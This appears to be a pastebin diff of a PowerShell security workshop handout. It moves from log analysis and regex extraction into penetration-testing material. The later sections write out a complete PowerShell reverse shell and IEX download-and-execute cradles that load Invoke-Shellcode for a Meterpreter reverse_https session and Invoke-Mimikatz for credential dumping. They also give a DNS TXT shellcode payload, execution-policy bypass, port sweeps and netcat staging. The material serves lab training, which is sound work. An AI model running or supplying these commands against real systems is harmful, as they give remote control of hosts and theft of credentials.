SHOW:
|
|
- or go back to the newest paste.
1 | - | Powershell Class Video: |
1 | + | Day 1: Video |
2 | - | https://s3.amazonaws.com/StrategicSec-Videos/2015-10-31+09.04+Hacking+with+Powershell+Workshop.mp4 |
2 | + | |
3 | ||
4 | Video Remake: | |
5 | https://s3.amazonaws.com/StrategicSec-Videos/_2015_7_11_rec-lw-us-10_267797_recording.mp4 | |
6 | - | Old Powershell Video: |
6 | + | |
7 | ||
8 | ####################### | |
9 | # VMs for this course # | |
10 | ####################### | |
11 | https://s3.amazonaws.com/StrategicSec-VMs/Win7x64.zip | |
12 | username: workshop | |
13 | password: password | |
14 | ||
15 | https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu14.zip | |
16 | username: strategicsec | |
17 | password: strategicsec | |
18 | ||
19 | You can do the updates in the Win7 VM (yes, it is a lot of updates). | |
20 | ||
21 | You'll need to create directory in the Win7 VM called "c:\ps" | |
22 | ||
23 | In this file you will also need to change the text 'Strategic-Sec-Ubuntu-VM-IP' to the IP address of your Ubuntu host. | |
24 | ||
25 | ||
26 | ||
27 | ##################### | |
28 | # Powershell Basics # | |
29 | ##################### | |
30 | ||
31 | PowerShell is Microsoft’s new scripting language that has been built in since the release Vista. | |
32 | ||
33 | PowerShell file extension end in .ps1 . | |
34 | ||
35 | An important note is that you cannot double click on a PowerShell script to execute it. | |
36 | ||
37 | To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell or Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell. | |
38 | ||
39 | dir | |
40 | cd | |
41 | ls | |
42 | cd c:\ | |
43 | ||
44 | ||
45 | To obtain a list of cmdlets, use the Get-Command cmdlet | |
46 | ||
47 | Get-Command | |
48 | ||
49 | ||
50 | ||
51 | You can use the Get-Alias cmdlet to see a full list of aliased commands. | |
52 | ||
53 | Get-Alias | |
54 | ||
55 | ||
56 | ||
57 | Don't worry you won't blow up your machine with Powershell | |
58 | Get-Process | stop-process What will this command do? | |
59 | Get-Process | stop-process -whatif | |
60 | ||
61 | ||
62 | To get help with a cmdlet, use the Get-Help cmdlet along with the cmdlet you want information about. | |
63 | ||
64 | Get-Help Get-Command | |
65 | ||
66 | Get-Help Get-Service –online | |
67 | ||
68 | Get-Service -Name TermService, Spooler | |
69 | ||
70 | Get-Service –N BITS | |
71 | ||
72 | Start-Transcript | |
73 | ||
74 | PowerShell variables begin with the $ symbol. First lets create a variable | |
75 | ||
76 | $serv = Get-Service –N Spooler | |
77 | ||
78 | To see the value of a variable you can just call it in the terminal. | |
79 | ||
80 | $serv | |
81 | ||
82 | $serv.gettype().fullname | |
83 | ||
84 | ||
85 | Get-Member is another extremely useful cmdlet that will enumerate the available methods and properties of an object. You can pipe the object to Get-Member or pass it in | |
86 | ||
87 | $serv | Get-Member | |
88 | ||
89 | Get-Member -InputObject $serv | |
90 | ||
91 | ||
92 | ||
93 | ||
94 | ||
95 | Let’s use a method and a property with our object. | |
96 | ||
97 | $serv.Status | |
98 | $serv.Stop() | |
99 | $serv.Refresh() | |
100 | $serv.Status | |
101 | $serv.Start() | |
102 | $serv.Refresh() | |
103 | $serv.Status | |
104 | ||
105 | ||
106 | ||
107 | ||
108 | Methods can return properties and properties can have sub properties. You can chain them together by appending them to the first call. | |
109 | ||
110 | ||
111 | ||
112 | ############################# | |
113 | # Simple Event Log Analysis # | |
114 | ############################# | |
115 | ||
116 | Step 1: Dump the event logs | |
117 | --------------------------- | |
118 | The first thing to do is to dump them into a format that facilitates later processing with Windows PowerShell. | |
119 | ||
120 | To dump the event log, you can use the Get-EventLog and the Exportto-Clixml cmdlets if you are working with a traditional event log such as the Security, Application, or System event logs. | |
121 | If you need to work with one of the trace logs, use the Get-WinEvent and the ExportTo-Clixml cmdlets. | |
122 | ||
123 | Get-EventLog -LogName application | Export-Clixml Applog.xml | |
124 | ||
125 | type .\Applog.xml | |
126 | ||
127 | $logs = "system","application","security" | |
128 | ||
129 | The % symbol is an alias for the Foreach-Object cmdlet. It is often used when working interactively from the Windows PowerShell console | |
130 | ||
131 | $logs | % { get-eventlog -LogName $_ | Export-Clixml "$_.xml" } | |
132 | ||
133 | ||
134 | ||
135 | Step 2: Import the event log of interest | |
136 | ---------------------------------------- | |
137 | To parse the event logs, use the Import-Clixml cmdlet to read the stored XML files. | |
138 | Store the results in a variable. | |
139 | Let's take a look at the commandlets Where-Object, Group-Object, and Select-Object. | |
140 | ||
141 | The following two commands first read the exported security log contents into a variable named $seclog, and then the five oldest entries are obtained. | |
142 | ||
143 | $seclog = Import-Clixml security.xml | |
144 | ||
145 | $seclog | select -Last 5 | |
146 | ||
147 | ||
148 | Cool trick from one of our students named Adam. This command allows you to look at the logs for the last 24 hours: | |
149 | ||
150 | Get-EventLog Application -After (Get-Date).AddDays(-1) | |
151 | ||
152 | You can use '-after' and '-before' to filter date ranges | |
153 | ||
154 | One thing you must keep in mind is that once you export the security log to XML, it is no longer protected by anything more than the NFTS and share permissions that are assigned to the location where you store everything. | |
155 | By default, an ordinary user does not have permission to read the security log. | |
156 | ||
157 | ||
158 | Step 3: Drill into a specific entry | |
159 | ----------------------------------- | |
160 | To view the entire contents of a specific event log entry, choose that entry, send the results to the Format-List cmdlet, and choose all of the properties. | |
161 | ||
162 | ||
163 | $seclog | select -first 1 | fl * | |
164 | ||
165 | The message property contains the SID, account name, user domain, and privileges that are assigned for the new login. | |
166 | ||
167 | ||
168 | ($seclog | select -first 1).message | |
169 | ||
170 | (($seclog | select -first 1).message).gettype() | |
171 | ||
172 | ||
173 | ||
174 | In the *nix world you often want a count of something (wc -l). | |
175 | How often is the SeSecurityPrivilege privilege mentioned in the message property? | |
176 | To obtain this information, pipe the contents of the security log to a Where-Object to filter the events, and then send the results to the Measure-Object cmdlet to determine the number of events: | |
177 | ||
178 | $seclog | ? { $_.message -match 'SeSecurityPrivilege'} | measure | |
179 | ||
180 | If you want to ensure that only event log entries return that contain SeSecurityPrivilege in their text, use Group-Object to gather the matches by the EventID property. | |
181 | ||
182 | ||
183 | $seclog | ? { $_.message -match 'SeSecurityPrivilege'} | group eventid | |
184 | ||
185 | Because importing the event log into a variable from the stored XML results in a collection of event log entries, it means that the count property is also present. | |
186 | Use the count property to determine the total number of entries in the event log. | |
187 | ||
188 | $seclog.Count | |
189 | ||
190 | ||
191 | ||
192 | ||
193 | ||
194 | ||
195 | ############################ | |
196 | # Simple Log File Analysis # | |
197 | ############################ | |
198 | ||
199 | ||
200 | You'll need to create the directory c:\ps and download sample iss log http://pastebin.com/raw.php?i=LBn64cyA | |
201 | ||
202 | ||
203 | mkdir c:\ps | |
204 | cd c:\ps | |
205 | (new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log") | |
206 | ||
207 | ||
208 | ||
209 | ||
210 | ||
211 | ||
212 | ||
213 | ||
214 | ############################################### | |
215 | # Intrusion Analysis Using Windows PowerShell # | |
216 | ############################################### | |
217 | ||
218 | Download sample file http://pastebin.com/raw.php?i=ysnhXxTV into the c:\ps directory | |
219 | ||
220 | ||
221 | ||
222 | ||
223 | ||
224 | (new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=ysnhXxTV", "c:\ps\CiscoLogFileExamples.txt") | |
225 | ||
226 | Select-String 192.168.208.63 .\CiscoLogFileExamples.txt | |
227 | ||
228 | ||
229 | ||
230 | ||
231 | The Select-String cmdlet searches for text and text patterns in input strings and files. You can use it like Grep in UNIX and Findstr in Windows. | |
232 | ||
233 | Select-String 192.168.208.63 .\CiscoLogFileExamples.txt | select line | |
234 | ||
235 | ||
236 | ||
237 | ||
238 | To see how many connections are made when analyzing a single host, the output from that can be piped to another command: Measure-Object. | |
239 | ||
240 | Select-String 192.168.208.63 .\CiscoLogFileExamples.txt | select line | Measure-Object | |
241 | ||
242 | ||
243 | ||
244 | To select all IP addresses in the file expand the matches property, select the value, get unique values and measure the output. | |
245 | ||
246 | Select-String “\b(?:\d{1,3}\.){3}\d{1,3}\b” .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select -ExpandProperty value | Sort-Object -Unique | Measure-Object | |
247 | ||
248 | ||
249 | ||
250 | Removing Measure-Object shows all the individual IPs instead of just the count of the IP addresses. The Measure-Object command counts the IP addresses. | |
251 | ||
252 | Select-String “\b(?:\d{1,3}\.){3}\d{1,3}\b” .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select -ExpandProperty value | Sort-Object -Unique | |
253 | ||
254 | ||
255 | In order to determine which IP addresses have the most communication the last commands are removed to determine the value of the matches. Then the group command is issued on the piped output to group all the IP addresses (value), and then sort the objects by using the alias for Sort-Object: sort count –des. | |
256 | This sorts the IP addresses in a descending pattern as well as count and deliver the output to the shell. | |
257 | ||
258 | Select-String “\b(?:\d{1,3}\.){3}\d{1,3}\b” .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select value | group value | sort count -des | |
259 | ||
260 | ||
261 | ||
262 | ||
263 | This will get the setting for logs in the windows firewall which should be enabled in GPO policy for analysis. | |
264 | The command shows that the Firewall log is at: | |
265 | %systemroot%\system32\LogFiles\Firewall\pfirewall.log, in order to open the file PowerShell will need to be run with administrative privileges. | |
266 | ||
267 | ||
268 | First step is to get the above command into a variable using script logic. | |
269 | Thankfully PowerShell has a built-in integrated scripting environment, PowerShell.ise. | |
270 | ||
271 | netsh advfirewall show allprofiles | Select-String FileName | select -ExpandProperty line | Select-String “%systemroot%.+\.log" | select -ExpandProperty matches | select -ExpandProperty value | sort –uniq | |
272 | ||
273 | ||
274 | ############################################## | |
275 | # Parsing Log files using windows PowerShell # | |
276 | ############################################## | |
277 | ||
278 | Download the sample IIS log http://pastebin.com/LBn64cyA | |
279 | ||
280 | ||
281 | (new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log") | |
282 | ||
283 | Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV")} | |
284 | ||
285 | ||
286 | ||
287 | The above command would give us all the WebDAV requests. | |
288 | ||
289 | To filter this to a particular user name, use the below command: | |
290 | ||
291 | Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV") -and ($_ | Select-String "OPTIONS")} | |
292 | ||
293 | ||
294 | ||
295 | Some more options that will be more commonly required : | |
296 | ||
297 | For Outlook Web Access : Replace WebDAV with OWA | |
298 | ||
299 | For EAS : Replace WebDAV with Microsoft-server-activesync | |
300 | ||
301 | For ECP : Replace WebDAV with ECP | |
302 | ||
303 | ||
304 | ||
305 | To find out the count of the EWS request we can go ahead and run the below command | |
306 | ||
307 | (Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV") -and ($_ | Select-String "Useralias")}).count | |
308 | ||
309 | ||
310 | ||
311 | ||
312 | ||
313 | #################################################################### | |
314 | # Windows PowerShell: Extracting Strings Using Regular Expressions # | |
315 | #################################################################### | |
316 | To build a script that will extract data from a text file and place the extracted text into another file, we need three main elements: | |
317 | ||
318 | 1) The input file that will be parsed | |
319 | ||
320 | (new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=rDN3CMLc", "c:\ps\emails.txt") | |
321 | (new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=XySD8Mi2", "c:\ps\ip_addresses.txt") | |
322 | (new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=v5Yq66sH", "c:\ps\URL_addresses.txt") | |
323 | ||
324 | 2) The regular expression that the input file will be compared against | |
325 | ||
326 | 3) The output file for where the extracted data will be placed. | |
327 | ||
328 | Windows PowerShell has a “select-string” cmdlet which can be used to quickly scan a file to see if a certain string value exists. | |
329 | Using some of the parameters of this cmdlet, we are able to search through a file to see whether any strings match a certain pattern, and then output the results to a separate file. | |
330 | ||
331 | To demonstrate this concept, below is a Windows PowerShell script I created to search through a text file for strings that match the Regular Expression (or RegEx for short) pattern belonging to e-mail addresses. | |
332 | ||
333 | $input_path = ‘c:\ps\emails.txt’ | |
334 | $output_file = ‘c:\ps\extracted_addresses.txt’ | |
335 | $regex = ‘\b[A-Za-z0-9._%-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}\b’ | |
336 | select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file | |
337 | ||
338 | In this script, we have the following variables: | |
339 | ||
340 | 1) $input_path to hold the path to the input file we want to parse | |
341 | ||
342 | 2) $output_file to hold the path to the file we want the results to be stored in | |
343 | ||
344 | 3) $regex to hold the regular expression pattern to be used when the strings are being matched. | |
345 | ||
346 | The select-string cmdlet contains various parameters as follows: | |
347 | ||
348 | 1) “-Path” which takes as input the full path to the input file | |
349 | ||
350 | 2) “-Pattern” which takes as input the regular expression used in the matching process | |
351 | ||
352 | 3) “-AllMatches” which searches for more than one match (without this parameter it would stop after the first match is found) and is piped to “$.Matches” and then “$_.Value” which represent using the current values of all the matches. | |
353 | ||
354 | Using “>” the results are written to the destination specified in the $output_file variable. | |
355 | ||
356 | Here are two further examples of this script which incorporate a regular expression for extracting IP addresses and URLs. | |
357 | ||
358 | IP addresses | |
359 | ------------ | |
360 | For the purposes of this example, I ran the tracert command to trace the route from my host to google.com and saved the results into a file called ip_addresses.txt. You may choose to use this script for extracting IP addresses from router logs, firewall logs, debug logs, etc. | |
361 | ||
362 | $input_path = ‘c:\ps\ip_addresses.txt’ | |
363 | $output_file = ‘c:\ps\extracted_ip_addresses.txt’ | |
364 | $regex = ‘\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b’ | |
365 | select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file | |
366 | ||
367 | ||
368 | URLs | |
369 | ---- | |
370 | For the purposes of this example, I created a couple of dummy web server log entries and saved them into URL_addresses.txt. | |
371 | You may choose to use this script for extracting URL addresses from proxy logs, network packet capture logs, debug logs, etc. | |
372 | ||
373 | $input_path = ‘c:\ps\URL_addresses.txt’ | |
374 | $output_file = ‘c:\ps\extracted_URL_addresses.txt’ | |
375 | $regex = ‘([a-zA-Z]{3,})://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?’ | |
376 | select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file | |
377 | ||
378 | ||
379 | In addition to the examples above, many other types of strings can be extracted using this script. | |
380 | All you need to do is switch the regular expression in the “$regex” variable! | |
381 | In fact, the beauty of such a PowerShell script is its simplicity and speed of execution. | |
382 | ||
383 | ||
384 | ||
385 | ################################# | |
386 | # Packet Sniffer For Powershell # | |
387 | ################################# | |
388 | ||
389 | Reference: | |
390 | http://poshcode.org/764 | |
391 | http://blog.robbiefoust.com/?p=68 | |
392 | http://blog.robbiefoust.com/?p=9 | |
393 | ||
394 | I was looking for a Powershell script that would capture raw IP packets on the network and shove them into an object, but the only one I was able to find was a commercial cmdlet that was out of my budget. So, I decided that I would attempt to write my own. I figured it would be a great learning exercise (and it was), but I went into the project with the goal of avoiding any 3rd party software, to avoid compiling anything (like a cmdlet written in C#), and I didn’t want to install a driver shim. In other words, I wanted a plain ‘ol script that could be run on any computer. | |
395 | ||
396 | I basically spent a lot of time googling and I got a lot of help from the guys over in the #Powershell IRC channel (irc.freenode.net). All of that combined with trial-and-error, I give you…. *drumroll* get-packet.ps1. | |
397 | ||
398 | The script recognizes IPv4 TCP, UDP, ICMP, and IGMP packets (for now). The thing that took me the longest amount of time trying to figure out was how to get all packets that the network card was seeing on the wire, not just packets destined for my IP address and a particular port number. The solution was hard to find but wasn’t terribly difficult to understand. | |
399 | ||
400 | # Create a new socket... SocketType should be Raw, and ProtocolType must be IP for promiscuous mode. | |
401 | $socket = new-object system.net.sockets.socket([Net.Sockets.AddressFamily]::InterNetwork,[Net.Sockets.SocketType]::Raw,[Net.Sockets.ProtocolType]::IP) | |
402 | ||
403 | # Include the IP header so we get the full packet | |
404 | $socket.setsocketoption("IP","HeaderIncluded",$true) | |
405 | ||
406 | # bind to a local IP address$ipendpoint = new-object system.net.ipendpoint([net.ipaddress]"$localIP",0)$socket.bind($ipendpoint) | |
407 | ||
408 | # this switches the NIC driver into promiscuous mode. This requires admin rights. | |
409 | [void]$socket.iocontrol([net.sockets.iocontrolcode]::ReceiveAll,$byteIn,$byteOut) | |
410 | I read somewhere that .net sockets really just uses winsock under the hood, so it really helped my understanding to read both the winsock and dotnet documentation regarding sockets on msdn. I won’t bother repeating what that documentation says here but if you’re trying to decypher this script and can’t quite figure it out, feel free to ask questions and I’ll try to explain. | |
411 | ||
412 | Something else that I probably knew at one point but had since forgotten was that the byte order on the network wire is reversed. On the wire it is “Big Endian” and on the PC it is “Little Endian.” Wikipedia has a great explanation on Endianness. Figuring out how to interpret the IP packets was the next biggest time suck and endianness was a large part of it. Once I realized that NetworkToHostOrder didn’t support unsigned ints, I simply wrote a few functions to reverse the byte order (from “Network” to “Host”) and used BitConverter to return the correct data type. | |
413 | ||
414 | # Takes a 2 byte array, switches it from big endian to little endian, and converts it to uint16. | |
415 | function NetworkToHostUInt16 ($value) { [Array]::Reverse($value) [BitConverter]::ToUInt16($value,0) } | |
416 | ||
417 | # Takes a 4 byte array, switches it from big endian to little endian, and converts it to uint32. | |
418 | function NetworkToHostUInt32 ($value) { [Array]::Reverse($value) [BitConverter]::ToUInt32($value,0) } | |
419 | ||
420 | # Takes a byte array, switches it from big endian to little endian, and converts it to a string. | |
421 | function ByteToString ($value) { $AsciiEncoding = new-object system.text.asciiencoding $AsciiEncoding.GetString($value) } | |
422 | After getting all the data out of the packets, I shove the ones I really want into a psobject. When running the script, it will be visually more appealing if you pipe the output to format-table. | |
423 | ||
424 | PS C:\> ./get-packet.ps1 | ft | |
425 | There are a lot more protocol types that I could be looking for, and I’ll probably add some of the more common ones eventually. I’ve also looked into adding support to export and import the libpcap file format, but after looking at the libpcap source code, there’s a lot of ugly in there that I might just avoid for now. | |
426 | ||
427 | quick way to done this is | |
428 | ||
429 | (new-object System.Net.WebClient).DownloadFile("http://poshcode.org/get/764", "c:\ps\get-packet.ps1") | |
430 | PS C:\> ./get-packet.ps1 | ft | |
431 | ||
432 | try to open some web page | |
433 | ||
434 | ||
435 | ################### | |
436 | # Pentester Tasks # | |
437 | ################### | |
438 | Reference: | |
439 | http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/02/use-powershell-for-network-host-and-port-discovery-sweeps.aspx | |
440 | ||
441 | ||
442 | Listing IPs | |
443 | One of the typical ways for working with IP addressed in most scripts is to work with an octet and then increase the last one | |
444 | ||
445 | $octect = "192.168.6." | |
446 | $lastoctect = (1..255) | |
447 | $lastoctect | ForEach-Object {write-host "$($octect)$($_)"} | |
448 | ||
449 | Ping Sweep | |
450 | PowerShell provides several methods for doing Ping | |
451 | Test-Connection cmdlet | |
452 | Creation of a WMI Object | |
453 | .Net System.Net.NetworkInformation.Ping Object | |
454 | ||
455 | function New-IPRange ($start, $end) { | |
456 | $ip1 = ([System.Net.IPAddress]$start).GetAddressBytes() | |
457 | [Array]::Reverse($ip1) | |
458 | $ip1 = ([System.Net.IPAddress]($ip1 -join '.')).Address | |
459 | ||
460 | $ip2 = ([System.Net.IPAddress]$end).GetAddressBytes() | |
461 | [Array]::Reverse($ip2) | |
462 | $ip2 = ([System.Net.IPAddress]($ip2 -join '.')).Address | |
463 | ||
464 | for ($x=$ip1; $x -le $ip2; $x++) { | |
465 | $ip = ([System.Net.IPAddress]$x).GetAddressBytes() | |
466 | [Array]::Reverse($ip) | |
467 | $ip -join '.' | |
468 | } | |
469 | } | |
470 | $ping = New-Object System.Net.NetworkInformation.Ping | |
471 | New-IPRange 192.168.6.1 192.168.6.150 | ForEach-Object {$ping.Send($_, 100)} | where {$_.status -eq "Success"} | |
472 | ||
473 | Reverse Lookups | |
474 | For reverse lookups using .Net Class we use the [System.Net.Dns]::GetHostEntry(IP) method Returns System.Net.IPHostEntry | |
475 | ||
476 | [System.Net.Dns]::GetHostByAddress("204.244.123.113") | |
477 | ||
478 | ||
479 | Forward Lookups | |
480 | ||
481 | [System.Net.Dns]::GetHostAddresses("www.google.com") | |
482 | ||
483 | Port Scans | |
484 | To test if a port is open on a remote host in PowerShell the best method is to use the .Net abstraction that it provides to Windows Socket library | |
485 | For TCP the .Net System.Net.Sockets.TcpClient | |
486 | For UDP the .Net System.Net.Sockets.UdpClient | |
487 | TCP Scan | |
488 | ||
489 | $ports=22,80 | |
490 | $target = "Strategic-Sec-Ubuntu-VM-IP" | |
491 | foreach ($i in $ports) { | |
492 | try { | |
493 | $socket = new-object System.Net.Sockets.TCPClient($target, $i); | |
494 | } catch {} | |
495 | if ($socket -eq $NULL) { | |
496 | echo "$target:$i - Closed"; | |
497 | } else { | |
498 | echo "$target:$i - Open"; | |
499 | $socket = $NULL; | |
500 | }} | |
501 | ||
502 | ||
503 | PARSING NMAP RESULT | |
504 | Run Powershell as administrator | |
505 | ||
506 | cd C:\ | |
507 | ||
508 | Get-ExecutionPolicy | |
509 | Set-ExecutionPolicy Unrestricted –Force | |
510 | ||
511 | ||
512 | ||
513 | Parse nmap XML | |
514 | .\parse-nmap.ps1 samplescan.xml | |
515 | ||
516 | Process all XML files | |
517 | ||
518 | .\parse-nmap.ps1 *.xml | |
519 | ||
520 | Piping also works | |
521 | dir *.xml | .\parse-nmap.ps1 | |
522 | ||
523 | Advanced parsing with filtering conditions | |
524 | .\parse-nmap.ps1 samplescan.xml | where {$_.OS -like "*Windows XP*"} | format-table IPv4,HostName,OS | |
525 | ||
526 | More parsing | |
527 | .\parse-nmap.ps1 samplescan.xml | where {$_.Ports -like "*open:tcp:22*"} | |
528 | ||
529 | Parsing with match and multiple conditions | |
530 | .\parse-nmap.ps1 samplescan.xml |where {$_.Ports -match "open:tcp:80|open:tcp:443"} | |
531 | ||
532 | CSV Export | |
533 | .\parse-nmap.ps1 samplescan.xml -outputdelimiter " " | where {$_.Ports -match "open:tcp:80"} | export-csv weblisteners.csv | |
534 | ||
535 | Import Data from CSV | |
536 | $data = import-csv weblisteners.csv | |
537 | $data | where {($_.IPv4 -like "10.57.*") -and ($_.Ports -match "open:tcp:22")} | |
538 | ||
539 | Export to HTML | |
540 | .\parse-nmap.ps1 samplescan.xml -outputdelimiter " " |select-object IPv4,HostName,OS | ConvertTo-Html | out-file report.html | |
541 | ||
542 | ||
543 | ||
544 | ||
545 | Nessus with PowerShell | |
546 | ||
547 | Let’s take a look at the Import-Csv cmdlet and what are the members of the object it returns: | |
548 | ||
549 | Import-Csv C:\class_nessus.csv | Get-Member | |
550 | ||
551 | filter the objects: | |
552 | ||
553 | Import-Csv C:\class_nessus.csv | where {$_.risk -eq "high"} | |
554 | ||
555 | use the Select-Object cmdlet and only get unique entries: | |
556 | ||
557 | Import-Csv C:\class_nessus.csv | where {$_.risk -eq "high"} | select host -Unique | |
558 | ||
559 | Import-Csv C:\class_nessus.csv | where {"high","medium","low" -contains $_.risk} | select "Plugin ID", CVE, CVSS, Risk, Host, Protocol, Port, Name | Out-GridView | |
560 | ||
561 | ||
562 | ConvertTo-Html cmdlet and turn it in to an HTML report in list format: | |
563 | ||
564 | Import-Csv C:\class_nessus.csv | where {"high","medium","low" -contains $_.risk} | select "Plugin ID", CVE, CVSS, Risk, Host, Protocol, Port, Name | ConvertTo-Html -As List > C:\report2.html | |
565 | ||
566 | ||
567 | ||
568 | ||
569 | ||
570 | **************************** | |
571 | Reverseshell with PowerShell | |
572 | **************************** | |
573 | nc -lvp 1234 (command prompt 1) | |
574 | ||
575 | ||
576 | (command prompt 2) | |
577 | powershell -command "function ReverseShellClean {if ($client.Connected -eq $true) {$client.Close()}; if ($process.ExitCode -ne $null) {$process.Close()}; exit; };$address = '127.0.0.1'; $port = '1234';$client = New-Object system.net.sockets.tcpclient; $client.connect($address,$port) ;$stream = $client.GetStream();$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize ;$process = New-Object System.Diagnostics.Process ;$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe' ;$process.StartInfo.RedirectStandardInput = 1 ;$process.StartInfo.RedirectStandardOutput = 1;$process.StartInfo.UseShellExecute = 0 ;$process.Start() ;$inputstream = $process.StandardInput ;$outputstream = $process.StandardOutput ;Start-Sleep 1 ;$encoding = new-object System.Text.AsciiEncoding ;while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())};$stream.Write($encoding.GetBytes($out),0,$out.Length) ;$out = $null; $done = $false; $testing = 0; ;while (-not $done) {if ($client.Connected -ne $true) {cleanup} ;$pos = 0; $i = 1; while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) { $read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos); $pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}} ;if ($pos -gt 0){ $string = $encoding.GetString($networkbuffer,0,$pos); $inputstream.write($string); start-sleep 1; if ($process.ExitCode -ne $null) {ReverseShellClean};else { $out = $encoding.GetString($outputstream.Read()); while($outputstream.Peek() -ne -1){; $out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}; $stream.Write($encoding.GetBytes($out),0,$out.length); $out = $null; $string = $null}} else {ReverseShellClean}};" | |
578 | ||
579 | ||
580 | #################################################### | |
581 | # Running Powershell From A Command Prompt # | |
582 | # Using Powersploit & Nishang # | |
583 | #################################################### | |
584 | ||
585 | COMMAND & 1 PARAMATER SYNTAX: | |
586 | powershell -command "& {&'some-command' someParam}" | |
587 | ||
588 | ||
589 | ||
590 | MULTIPLE COMMAND & PARAMETER SYNTAX | |
591 | powershell -command "& {&'some-command' someParam}"; "& {&'some-command' -SpecificArg someParam}" | |
592 | ||
593 | ||
594 | ||
595 | Tools to download to the web root (/var/www) of your StrategicSec-Ubuntu-VM: | |
596 | https://github.com/mattifestation/PowerSploit.git | |
597 | https://github.com/samratashok/nishang | |
598 | ||
599 | from the strategicsec home dir copy nc.exe to /var/www/ folder | |
600 | ||
601 | user:strategicsec | |
602 | pass:strategicsec | |
603 | ||
604 | sudo cp nc.exe. /var/www | |
605 | ||
606 | cd /var/www | |
607 | sudo git clone https://github.com/samratashok/nishang | |
608 | sudo git clone https://github.com/mattifestation/PowerSploit | |
609 | ||
610 | ||
611 | ********************************** Simple Ping Sweep ********************************** | |
612 | powershell -command "50..100 | % {\""192.168.6.$($_): $(Test-Connection -count 1 -comp 192.168.6.$($_) -quiet)\""}" | |
613 | ||
614 | ||
615 | ||
616 | ||
617 | ||
618 | ********************************** Simple Port 445 Sweep ********************************** | |
619 | powershell -command "1..255 | % { echo ((new-object Net.Sockets.TcpClient).Connect(\""192.168.6.$_\"",445)) \""192.168.6.$_\""} 2>$null" | |
620 | ||
621 | ||
622 | ||
623 | ||
624 | ||
625 | ||
626 | ********************************** Simple Port Scan ********************************** | |
627 | powershell -command "1..1024 | % { echo ((new-object Net.Sockets.TcpClient).Connect(\""192.168.6.XX\"",$_)) \""$_ is open\""} 2>$null" | |
628 | ||
629 | ||
630 | ||
631 | ||
632 | ||
633 | ||
634 | ********************************** Download a file ********************************** | |
635 | powershell -command "(New-Object System.Net.WebClient).DownloadFile('http://Strategic-Sec-Ubuntu-VM-IP/nc.exe', 'nc.exe’)" | |
636 | ||
637 | ||
638 | ||
639 | ||
640 | ||
641 | ********************************** Downloading files: Binaries ********************************** | |
642 | powershell -command "(New-ObjectSystem.Net.WebClient).DownloadFile("http://Strategic-Sec-Ubuntu-VM-IP/nc.exe","c:\nc.exe“)" | |
643 | ||
644 | ||
645 | ||
646 | ||
647 | ||
648 | ********************************** Text file stdout to local file ********************************** | |
649 | (New-Object System.Net.WebClient).DownloadString("http://Strategic-Sec-Ubuntu-VM-IP/PowerSploit/CodeExecution/Invoke-Shellcode.ps1") | Out-File -Encoding ASCII Invoke-Shellcode.ps1 | |
650 | ||
651 | ||
652 | ||
653 | ||
654 | ********************************** Powershell Download & Execute Reverse Meterpreter ********************************** | |
655 | from ubuntu host browse to metasploit folder | |
656 | cd ~/toolz/metasploit/ | |
657 | ||
658 | sudo ./msfconsole | |
659 | use exploit/multi/handler | |
660 | set ExitOnSession false | |
661 | set payload windows/meterpreter/reverse_https | |
662 | set LHOST Strategic-Sec-Ubuntu-VM-IP | |
663 | set LPORT 443 | |
664 | set EXITFUNC thread | |
665 | exploit -j | |
666 | ||
667 | ||
668 | ||
669 | powershell -command "IEX (New-Object Net.WebClient).DownloadString('https://s3.amazonaws.com/StrategicSec-Files/Powersploit/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost Strategic-Sec-Ubuntu-VM-IP -Lport 443 -Force" | |
670 | ||
671 | ||
672 | ||
673 | ||
674 | ||
675 | ********************************** Payload which could execute shellcode from DNS TXT queries. ********************************** | |
676 | powershell.exe (new-object System.Net.WebClient).DownloadFile('http://Strategic-Sec-Ubuntu-VM-IP/nishang/Execution/Execute-DNSTXT-Code.ps1','%TEMP%\Execute-DNSTXT-Code.ps1') | |
677 | powershell.exe -ExecutionPolicy Bypass -command %TEMP%\Execute-DNSTXT-Code.ps1 32.alteredsecurity.com 64.alteredsecurity.com ns8.zoneedit.com | |
678 | ||
679 | ||
680 | ||
681 | ||
682 | ||
683 | ||
684 | powershell -command "IEX (New-Object Net.WebClient).DownloadString('http://Strategic-Sec-Ubuntu-VM-IP/powersploit/Exfiltration/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz" | |
685 | ||
686 | ||
687 | ||
688 | ||
689 | ||
690 | ||
691 | ||
692 | ||
693 | ||
694 | ********************************** Run mimikatz via powershell (must be run as SYSTEM) ********************************** | |
